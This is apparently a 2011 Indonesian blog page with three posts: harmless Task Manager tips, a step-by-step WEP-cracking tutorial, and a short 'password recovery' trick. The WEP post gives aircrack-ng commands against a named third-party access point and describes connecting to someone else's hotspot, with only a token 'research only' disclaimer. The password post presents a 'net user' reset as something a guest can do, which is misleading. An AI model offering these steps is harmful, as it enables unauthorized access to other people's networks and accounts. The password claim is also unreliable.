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Tips-Trick : 8 Cara Mempercepat PC

Most of you are using windows operating systems , but not all of you knows about the working of task manager .Its not just a simple window that gives you details about what programs are running , its definitely more than that .You can make your PC really fast , if you know some of the basic tricks of Task Manager . Let us first discuss something about task manager .

There are 3 ways to open Task Manager .First you can open it by right clicking the task bar  and selecting task manger , if you don’t see task manger there then you PC is infected with virus  . Secondly you can open it by pressing ctrl + shift +Esc . Thirdly you can launch task manager by pressing ctrl+Alt+delete  in your keyboard .

1 Browsing your Processes
The first thing you will see in your Task Manager  is the Application tab which tells you which applications are currently running , but it doesn’t reveals the actual thing . To know what’s actually running in your PC click the Processes tab and check “Show processes from all users” , which give you all the currently running processes.

2. Viewing Memory in use
With Task Manager you can view which processes are taking how much amount of memory  . This can be very useful to you if you are having less amount of memory . You can remove few unwanted processes by right  clicking the process name and selecting end task . This will free the memory used by that process , but be sure you don’t remove the system process , otherwise your PC may shutdown . Having some free available memory will make your PC work fast .
3. Diagnosing  disk thrashing
You would have noticed sometimes that your hard drive is continuously thrashing   even though there’s no-one at the PC . To find out why , Click the Task Manager Processes tab, then click View > Select Columns, and check I/O Read Bytes and I/O Write Bytes. Click OK. The new columns will show you the total amount of data read or written by a process, which applies to network activity as well as your hard drive. The busiest processes will have the largest figures, and if a process is active now then its totals will tick up as you watch.
4. Removing Running Process
If any of your process is taking a lot of memory or keeping your CPU busy unnecessary , then you can remove such running process without rebooting with task manager  , but if that process is important like system process or any other important process  , then killing the process may crash your system or cause some loss of data .  So we will first reduce the priority of that process .  Right-click your CPU-hogging process, select Set Priority > Low, and Windows should immediately give more CPU time to just about everything else on your PC. The program will still be running, it just shouldn’t interfere with other apps to the same degree, and they should be accessible again.
If there are still problems, right-click the process and select Set Affinity. This option lets you decide which CPU cores a process can use. If you clear one of these then that core will become available to other applications, which should significantly improve their performance.
5. Restarting Explorer.
Sometimes your taskbar and desktop may disappear , in this case you can take the help of task manager press Ctrl+Shift+Esc and press the Processes tab to check for yourself. If Explorer.exe isn’t listed then click File > New Task, type Explorer.exe and click OK to restart it , your desktop and task bar should come back.

6 Finding System Resources .
Launching Task Manager and clicking the Performance tab will reveal the total amount of RAM installed in your PC (check the Total in the Physical Memory box).
7 Monitoring Network utilization
Click the Task Manager Networking tab and you’ll see a graph that tracks your current network use over time. This can be useful if you’ve a network-hogging process that fires on a regular basis, for instance, as you should see a spike on the chart.

8 CPU Utilization
Launch Task Manager, and click the Performance tab to see a graph of your CPU Usage History: . Click View and select Show Kernel Times (so it’s checked). What you’ll now see is two graph lines: one green, representing total CPU utilisation, and one red, representing the time consumed by the kernel. When the green peaks are high, red peaks low then the culprit is a user mode process, probably just a regular application. But if the red peaks are consistently high then that shows your CPU time is being grabbed by something in the kernel, probably a driver, but perhaps also a Windows component, maybe even some deeply embedded malware.
Task Manger is a useful tool .There are some other freely available tools which are similar to task mangers , but provides you with some more facilities . Process Explorer is the best known alternative for task manager another one available is  Process Hacker

tinggalkan  komentar anda di bawah ini,  jika merasa artikel ini layak bagi anda.
sebagai penilaian bagi saya (Faneza Jaya). dalam postingan ini.
Terima kasih.

All about ™  blogspot© 2011 Faneza jaya All Rights Reserved

Cracking : WEP Crack + Cracking Tutorial

Wah kayaknya seru neh kalo bisa online dimana-mana pake notebooks plus wifi, inget kata orang2 bijak, tutorial ini hannya untuk keperluan riset semata, penggunaan yang menyebabkan kerugian dalam bentuk apa pun adalah tanggung jawab masing-masing yah.. hehehe… Wired Equivalent Privacy atau (WEP) adalah salah satu cara mengamankan Acces point anda dari penggunaan yang tidak di inginkan detailnya tentang WEP silahkan langsung ke paman wiki,..

Langkah 1, Install Aircrack-ng
#sudo apt-get install aircrack-ng
Langkah 2, Indentifikasi Device Kita
cari tau dulu MAC address device usb kita dan lokasi device tersebut,..
#sudo iwconfig

#sudo ifconfig

oke dengan kedua perintah diatas kita sudah dapat mengetahui kalo lokasi device wireless kita berada di eth2 dengan mac 00:02:72:5A:3B:6C kita lanjut ke langkah selanjutnya,..
Langkah 3, Scanning
Scanning semua Access Point sasaran untuk mengetahui 3 hal, ssid “mukegile“, mac 00:18:F8:36:83:23 channel 6 tempat acces point beroprasi,…
#sudo airmon-ng stop eth2
#sudo iwlist eth2 scanning

Langkah 4, Monitor Mode
lanjutkan dengan merubah wifi kita menjadi monitor mode,..
#sudo airmon-ng start eth2 6

Langkah 5, Capturing Package
Kerjaan selanjutnya menangkap paket yang keluar dari acces point disimpan sebagai file,..
#sudo airodump-ng -c 6 –bssid 00:18:F8:36:83:23 -w output eth2

nah kerjaan ini yang agak lama,… tergantung sekali dengan paket yang di broadcast,.. kalo banyak yang pake Access Point itu makin cepet kita bisa crack passwordnya,.. kira2 data yang harus kita kumpulkan untuk cukup meng-carck 128 bit encryptions yah sekita 80.000 IVs, kalo mau tau berapa IVs yang sudah kita punya,.. teken CTRL-C aja truz lanjutkan ke langkah selanjutnya,..
Langkah 6, Crack
#sudo aircrack-ng -z -b 00:18:F8:36:83:23 output*.cap

dari gambar diatas kita bisa liat bahwa IVs yang kita dapat sekitar 81313 IVs,.. dan kita sudah dapat menemukan key atau passwordnya,.. perlu di ingat jika IVs-nya masih belum mencukupi pada saat anda melakukan perintah #aircrack-ng maka anda harus mengulang langkah ke 5 begitu saja berulang-ulang sampai IVs-nya terpenuhi diatas 80.000 IVs,..
jika anda sudah mendapatkan passwordnya tinggal menggunakannya untuk connect atau associates ,.. nah kebetulan pada saat saya coba key-nya,.. ternyata terkoneksi dengan muluz,… dan langsung dapet IP,.. ternyata Acces Point Hot Spot tersebut memberikan IP otomatis atau DHCP,.. akhirnya bisa konek dech,..

keliatan tuh.. cepet lagi konek ke yahoo 200-san… keyen,,… lain lagi ceritannya nanti kalo ternyata IP-nya nggak Otomatis alias DHCP,.. ada lagi caranya supaya kita bisa tetep terkoneksi,.. tapi nanti dech di tutorial selanjutnya,.. selamet mencoba,…

sumber : binus hacker IHC

tinggalkan  komentar anda di bawah ini,  jika merasa artikel ini layak bagi anda.
sebagai penilaian bagi saya (Faneza Jaya). dalam postingan ini.
Terima kasih.

All about ™  blogspot© 2011 Faneza jaya All Rights Reserved

Cracking : Windows Password / Recovery

if you forget your windows acc password, but you can sign in as guess you can use this way to get your password back

1. run cmd
2. type “net user “username” *” type without ” in the fron and back
3. you will be prompt a new password
4. retype it
fwalla you got your acc back
example :
net user lord.aeon *
lord.aeon aka.rime.aeon of

tinggalkan  komentar anda di bawah ini,  jika merasa artikel ini layak bagi anda.
sebagai penilaian bagi saya (Faneza Jaya). dalam postingan ini.
Terima kasih.

All about ™  blogspot© 2011 Faneza jaya All Rights Reserved

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